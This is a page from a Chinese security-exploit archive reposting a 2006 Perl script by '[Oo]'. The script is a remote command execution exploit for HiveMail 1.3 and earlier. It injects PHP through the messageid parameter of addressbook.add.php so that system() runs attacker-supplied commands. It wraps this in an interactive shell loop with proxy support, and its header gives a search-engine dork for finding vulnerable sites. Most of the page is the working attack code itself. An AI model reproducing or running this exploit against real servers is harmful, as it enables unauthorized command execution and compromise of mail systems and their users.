首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HiveMail <= 1.3 (addressbook.add.php) Remote Code Execution Exploit
来源:http://www.gulftech.org 作者:Oo 发布时间:2006-05-08  

#!/usr/bin/perl #
# #
# HiveMail <= 1.3 remote command execution exploit #
# #
#################################################################################
# #
# Advisory: #
# http://www.gulftech.org/?node=research&article_id=00098-02102006 #
# #
# To get the hivesession: #
# log on hivemail with firefox then look at the hivesession number in the url. #
# (yes i know...) #
# #
#################################################################################
# #
# Dork: #
# "Already have an account?" "Enter your information below to log in." #
# #
########################################################################
# #
# coded by [Oo] #
# #
#################


require LWP::UserAgent;
use URI;
use Getopt::Long;

$| = 1; # fflush stdout after print

# Default options
# connection
my $basic_auth_user = '';
my $basic_auth_pass = '';
my $proxy = '';
my $proxy_user = '';
my $proxy_pass = '';
my $conn_timeout = 15;

# general
my $host;
my $session;

print "\n[i] HiveMail <= 1.3 remote command execution exploit\n";
print "[i] coded by [Oo]\n";

# read command line options
my $options = GetOptions (

#general options
'host=s' => \$host, # input host to test.
'session=s' => \$session, # input host to test.
# connection options
'basic_auth_user=s' => \$basic_auth_user,
'basic_auth_pass=s' => \$basic_auth_pass,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'timeout=i' => \$conn_timeout);

# command line sanity check
&show_usage unless ($host);
&show_usage unless ($session);

# main loop
while (1){
print "\n[hivemail] ";
my $cmd = <STDIN>;
hm_xploit ($cmd);
}

exit (1);

#exploit
sub hm_xploit {
chomp (my $data = shift);

if ($data eq "exit") { print "\n[e] Exit!\n";exit(); }

my $exp = $host."addressbook.add.php?hivesession=".$session."&cmd=quick&messageid=\");echo%20\"start_er\";system(\$com);echo%20\"end_er\";\@d(\"&popid=1&com=".$data." ";
my $req = new HTTP::Request 'GET' => $exp;


my $ua = new LWP::UserAgent;
$ua->timeout($conn_timeout);

if ($basic_auth_user){
$req->authorization_basic($basic_auth_user, $basic_auth_pass)
}
if ($proxy){
$ua->proxy(['http'] => $proxy);
$req->proxy_authorization_basic($proxy_user, $proxy_pass);
}


my $res = $ua->request($req);
my $show = $res->content;

print"\n";
if ($show =~ m/start_er(.*?)end_er/ms) {
my $out = $1;
$out =~ s/^\s+|\s+$//gs;
if ($out) {
print "$out\n";
}
}

}

# show options
sub show_usage {
print "\n[*] Usage: ./hmail_exp.pl [options] [host] [session]\n";
print "[*] Options:\n";
print "\t--proxy (http), --proxy_user, --proxy_pass\n";
print "\t--basic_auth_user, --basic_auth_pass\n";
print "\t--timeout \n";
print "[*] Example:\n";
print " hmail_exp.pl --host=http://127.0.0.1/hivemail/ --session=22ead72ecf6af376a801923466a23efa\n";
exit(1);
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AWStats <= 6.5 (migrate) Re
·acFTP FTP Server <= 1.4 (US
·Invision Power Board <= 2.1
·TinyFTPD <= 1.4 (USER) Remo
·Advanced GuestBook <= 2.4.0
·PHP-Fusion <= 6.00.306 Mult
·TopList <= 1.3.8 (phpBB Hac
·Jetbox CMS <= 2.1 (relative
·BL4 SMTP Server < 0.1.5 Rem
·ISPConfig <= 2.2.2 (session
·Invision Power Board <= 2.1
·Dokeos LMS <= 1.6.4 (authld
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved